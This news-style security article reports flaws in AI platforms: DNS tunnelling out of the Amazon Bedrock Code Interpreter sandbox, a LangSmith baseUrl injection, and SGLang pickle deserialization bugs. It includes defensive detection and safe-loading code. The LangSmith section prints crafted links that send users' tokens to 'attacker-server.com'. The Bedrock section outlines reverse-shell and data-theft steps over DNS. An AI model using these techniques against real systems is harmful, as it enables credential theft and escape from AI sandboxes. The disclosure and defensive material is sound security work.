Security Flaws in Amazon Bedrock, LangSmith, and SGLang Could Allow Data Exfiltration and Remote Code Execution

Cybersecurity researchers have uncovered multiple security weaknesses in several artificial intelligence platforms that could allow attackers to steal sensitive data or execute malicious commands. The issues affect services associated with Amazon, LangSmith, and SGLang.

According to recent research, attackers can exploit these weaknesses to extract confidential information, hijack accounts, and potentially gain remote code execution access in certain AI environments.

DNS-Based Technique Bypasses Isolation in Amazon Bedrock

Security researchers revealed a new attack technique that abuses the Domain Name System (DNS) to bypass network isolation inside AI code execution environments.

The report, published by BeyondTrust, shows that the sandbox environment used in Amazon Bedrock AgentCore Code Interpreter allows outbound DNS requests even when network access is restricted.

This behavior creates an opportunity for attackers to establish hidden communication channels. Through DNS queries, threat actors may be able to set up command-and-control communication and secretly transfer sensitive data outside the environment.

The vulnerability does not currently have an official CVE identifier but has been assigned a severity score of 7.5 on the CVSS scale.

The Code Interpreter service was introduced in August 2025 to allow AI agents to run code safely within isolated sandbox environments while preventing direct communication with external systems.

However, the discovery indicates that DNS requests can still be used as a communication pathway despite the intended network restrictions.

Potential Attack Scenario

Researchers demonstrated how attackers could exploit this functionality by establishing two-way communication over DNS.

Using this method, an attacker could:

  • Create an interactive reverse shell
  • Execute remote commands
  • Transfer sensitive information through DNS queries
  • Access protected cloud resources if permissions allow it

For example, if the service’s IAM role has access to AWS resources such as S3 storage buckets, attackers may retrieve sensitive information stored in those environments.

The DNS channel could also be used to deliver additional payloads. Commands could be stored within DNS records and executed by the interpreter, with results sent back using DNS subdomain queries.

Researchers warned that misconfigured IAM roles could make the situation worse. If the service is assigned excessive permissions, attackers may gain access to confidential infrastructure components.

BeyondTrust emphasized that DNS communication can undermine the isolation guarantees normally expected from sandboxed code execution environments.

Such attacks could lead to data breaches, infrastructure disruption, or exposure of sensitive customer information.

Amazon’s Response and Recommended Mitigation

After receiving responsible disclosure in September 2025, Amazon concluded that the behavior represents intended functionality rather than a software defect.

The company recommends organizations switch from sandbox mode to VPC mode to achieve stronger network isolation.

Amazon also advises customers to implement DNS firewall protections to monitor and filter outgoing DNS requests.

Security experts recommend several defensive steps including:

  • Migrating critical workloads to VPC mode
  • Deploying DNS firewall monitoring
  • Restricting IAM role permissions
  • Applying the principle of least privilege
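The "DNS firewall monitoring" step above is only useful if something actually looks at the query log for the pattern this technique produces: many distinct, long, high-entropy leftmost labels under one parent domain from one source. The following detection heuristic is an added example (not code from BeyondTrust, Amazon or the original article); the log records are constructed, and their field names (srcaddr, query_name, query_type) are an assumption standing in for whatever schema your resolver logs use.

```python
import json
import math
from collections import Counter, defaultdict

# Constructed sample records (JSON, one per line). The field names are an
# assumption, not a vendor format; map them to your resolver's own schema.
SAMPLE_LOG = """\
{"srcaddr":"10.0.1.7","query_name":"pypi.org.","query_type":"A"}
{"srcaddr":"10.0.1.9","query_name":"4d2a9f1c3b7e8a5d6f0c1b2a3e4d5c6f.t.example-c2.net.","query_type":"TXT"}
{"srcaddr":"10.0.1.9","query_name":"9e8d7c6b5a4f3e2d1c0b9a8f7e6d5c4b.t.example-c2.net.","query_type":"TXT"}
{"srcaddr":"10.0.1.9","query_name":"0a1b2c3d4e5f60718293a4b5c6d7e8f9.t.example-c2.net.","query_type":"TXT"}
{"srcaddr":"10.0.1.9","query_name":"f1e2d3c4b5a69788796a5b4c3d2e1f00.t.example-c2.net.","query_type":"TXT"}
"""

def shannon_entropy(s: str) -> float:
    """Bits per character; hex-encoded payload labels sit near 4.0."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0

def split_query(name: str):
    """Return (leftmost label, parent domain). Parent domain is approximated
    as the last two labels; production code should use the public suffix list."""
    labels = name.rstrip(".").lower().split(".")
    if len(labels) < 3:
        return None, ".".join(labels)
    return labels[0], ".".join(labels[-2:])

def find_tunnel_suspects(log_text, min_queries=3, min_len=20, min_entropy=3.0):
    """Flag (source, domain) pairs whose leftmost labels look like encoded data:
    many distinct labels, long, and high entropy. Returns a list of dicts."""
    per_pair = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        label, domain = split_query(rec["query_name"])
        if label is not None:
            per_pair[(rec["srcaddr"], domain)].append(label)
    suspects = []
    for (src, domain), labels in per_pair.items():
        unique = set(labels)
        if len(unique) < min_queries:
            continue
        mean_len = sum(map(len, unique)) / len(unique)
        mean_ent = sum(map(shannon_entropy, unique)) / len(unique)
        if mean_len >= min_len and mean_ent >= min_entropy:
            suspects.append({"srcaddr": src, "domain": domain, "queries": len(labels),
                             "mean_label_len": round(mean_len, 1), "mean_entropy": round(mean_ent, 2)})
    return suspects
```

Tune the thresholds against a baseline of your own sandbox traffic; CDN and telemetry hostnames can carry long labels too, so an allowlist of known parent domains belongs in front of this check.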

Jason Soroko, a senior fellow at Sectigo, stressed that administrators should review all Code Interpreter deployments and migrate sensitive workloads immediately.

LangSmith Vulnerability Could Lead to Account Takeovers

Another serious security flaw has been identified in LangSmith, a development and observability platform used for monitoring AI applications.

Security researchers from Miggo Security discovered a vulnerability tracked as CVE-2026-25750 with a CVSS score of 8.5.

The flaw is caused by improper validation of a URL parameter called baseUrl, which enables URL parameter injection attacks.

By manipulating this parameter, attackers can trick users into sending authentication information to malicious servers.

Attackers may distribute specially crafted links such as:

Cloud deployment
smith.langchain[.]com/studio/?baseUrl=https://attacker-server.com

Self-hosted deployment
<LangSmith_domain_of_the_customer>/studio/?baseUrl=https://attacker-server.com

If a logged-in user clicks the malicious link, sensitive tokens including bearer tokens, user IDs, and workspace identifiers may be leaked.

With these credentials, attackers could gain unauthorized access to internal data including:

  • AI trace histories
  • Internal SQL queries
  • Customer CRM records
  • Proprietary application source code

The vulnerability has been fixed in LangSmith version 0.12.71, released in December 2025.

Researchers emphasized that AI observability platforms are becoming essential infrastructure. Because these systems interact deeply with internal tools and data sources, security weaknesses may expose highly sensitive organizational data.

Critical Remote Code Execution Risks in SGLang

Additional vulnerabilities were discovered in SGLang, an open source framework used to deploy large language models and multimodal AI systems.

The issues were identified by Orca Security researcher Igor Stepansky and involve unsafe use of Python pickle deserialization.

Improper deserialization can allow attackers to execute malicious code remotely.

Three vulnerabilities have been reported:

CVE-2026-3059 (CVSS 9.8)
Unauthenticated remote code execution through the ZeroMQ broker in the multimodal generation system.

CVE-2026-3060 (CVSS 9.8)
Remote code execution through the encoder parallel disaggregation system using untrusted serialized data.

CVE-2026-3989 (CVSS 7.8)
Insecure deserialization in the replay_request_dump utility through unsafe pickle file handling.

These flaws arise from the use of functions such as pickle.loads() and pickle.load() without proper validation.

The vulnerabilities may allow attackers to send malicious serialized files to the system, which are then processed and executed.
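What makes pickle.loads() on network input equivalent to code execution is that the stream can name any importable callable and have it resolved and invoked during loading. The block below is an added example, not SGLang's code or its patch: it shows the standard mitigation of a restricted Unpickler that refuses every global reference, applied to two constructed streams, a plain request-like dict that loads and a stream that merely references a harmless stdlib function and is rejected before anything is resolved. Not using pickle across a trust boundary at all (JSON or another data-only format) remains the more robust fix.

```python
import io
import os
import pickle

class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global reference.

    pickle.load()/loads() resolve any "module.attribute" named in the
    stream, which is what turns deserialization of attacker-supplied
    bytes into code execution. Refusing find_class entirely limits the
    stream to primitive containers (dict, list, tuple, str, bytes, ints).
    """
    def find_class(self, module, name):
        raise pickle.UnpicklingError(
            f"refusing to resolve global {module}.{name}")

def safe_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()

def try_load(data: bytes):
    """Return ('ok', obj) or ('rejected', reason) for demonstration."""
    try:
        return ("ok", safe_loads(data))
    except pickle.UnpicklingError as exc:
        return ("rejected", str(exc))

# Constructed inputs. PLAIN_REQUEST is data only. GLOBAL_REFERENCE is a
# stream that names os.getcwd by reference: harmless here, but it is the
# same mechanism a hostile stream would use with a dangerous callable, and
# the restricted loader rejects it before any lookup happens.
PLAIN_REQUEST = pickle.dumps({"prompt": "hello", "max_tokens": 8})
GLOBAL_REFERENCE = pickle.dumps(os.getcwd)

if __name__ == "__main__":
    print(try_load(PLAIN_REQUEST))      # ('ok', {...})
    print(try_load(GLOBAL_REFERENCE))   # ('rejected', 'refusing to resolve global ...')
```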

A coordinated advisory from the CERT Coordination Center confirmed that exploitation is possible if the vulnerable modules are enabled and accessible over the network.

If attackers know the TCP port used by the ZeroMQ broker, they could send malicious requests that trigger deserialization and execute arbitrary commands.
